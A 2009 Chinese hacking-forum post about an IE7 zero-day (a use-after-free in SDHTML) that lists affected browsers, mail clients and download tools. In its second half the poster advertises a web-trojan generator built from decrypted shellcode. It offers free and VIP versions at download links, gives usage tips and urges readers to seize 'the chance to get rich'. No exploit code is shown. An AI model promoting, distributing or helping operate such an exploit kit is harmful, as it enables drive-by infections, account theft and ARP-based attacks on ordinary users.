|
|
楼主 |
发表于 2009-1-23 23:36:24
|
显示全部楼层
|阅读模式
来自 四川省内江市
漏洞介绍:
微软IE 7 0day漏洞是一个基于IE7浏览器内核的漏洞,所有基于IE7内核的浏览器和应用程序都会成为攻击对
象。如傲游、世界之窗、腾讯TT、Office系统软件、Outlook、某些网游的登陆界面等等。
目前已经发现“IE7 0day漏洞生成工具”,而且金山毒霸已经截获数个利用该漏洞的恶意挂马网站。目前挂
马的网站都是通过这一类型的工具自动生成的,下载的病毒主要是超级AV终结者、weiai、扫荡波一类的下载器
。这些下载器再下载大量的盗号木马、ARP攻击木马等。
描述:
由于SDHTML里处理对象存在在错误导致内存紊乱。构造某种条件可以使得SDHTML检测到错误释放已被分配的
对象,但是释放已被分配的对象后SDHTML并未返回而是继续使用被释放的对象的内存执行,如 果这些内存又被
分配给其他用途,将导致SDHTML把这些内存当作一个对象来操作。0DAY挂马里使用了XML的SRC字符串对象占用了
这些释放对象的空 间,而对象指针里包含函数例程指针,最终导致代码执行 。
影响的平台是:
windows xp2003 安装了IE7的用户
常用可能“中招”的软件列表:
浏览器类(基于IE内核的,访问挂马网站时可能会中招)
1)IE7浏览器
2)傲游浏览器
3)世界之窗
4)腾讯TT
5)糖果浏览器
6)greenbrowser.exe
邮件客户端软件(浏览含有攻击代码的邮件时可能中招)
1) outlook
2) foxmail
下载软件(局域网ARP攻击,可能将恶意代码插入到下载软件提供的内嵌网页中)
1) 迅雷
2) 快车
3) 超级旋风
4) 电驴
5) BT
6)ppstream
7) pplive
等等
音乐视听(局域网ARP攻击,将恶意代码插入到下载软件提供的内嵌网页中)
1)千千静听
2)酷我音乐
3)Real播放器等
IM软件
1) 腾讯QQ的迷你主页
2)MSN资讯
3)旺旺焦点等等
几乎所有通过互联网下载和升级的软件都会包含这种内嵌网页,如果有ARP攻击插入代码,则打开时都可能
中招。
是个相当优秀的好洞。昨天连夜分析了几个shellcode,有几个还有后门,有几个没什么用,找了两个最好的,分
析算法,解密,代码做了下优化,然后写了生成器。
2个版本的,一个shellcode在漏洞运行之后会关IE.另外一个不会。然后工作室本来是打算关IE版本的免费发布
,不关IE版本的给VIP用户做更新。后来还是决定全部免费发布算了。免费版本的会卡下IE.然后代码优化版本的
不卡IE.做为VIP版本增加的漏洞之一。以前购买VIP版本的用户在更新期间请联系我免费升级包含独立代码版本
的IE7 0day的综合网马生成器。是个好洞~~大家不要错过发财的机会哈!另外,木马地址必须为偶数。生成器会
提示的。
关IE版本截图:
关IE版本下载:http://www.jxfhack.com/soft/ie0dayfree.rar
不关IE版本截图:
不关IE版本下载:http://www.jxfhack.com/soft/ie0dayyh.rar |
|
发表于 2009-1-24 00:20:47
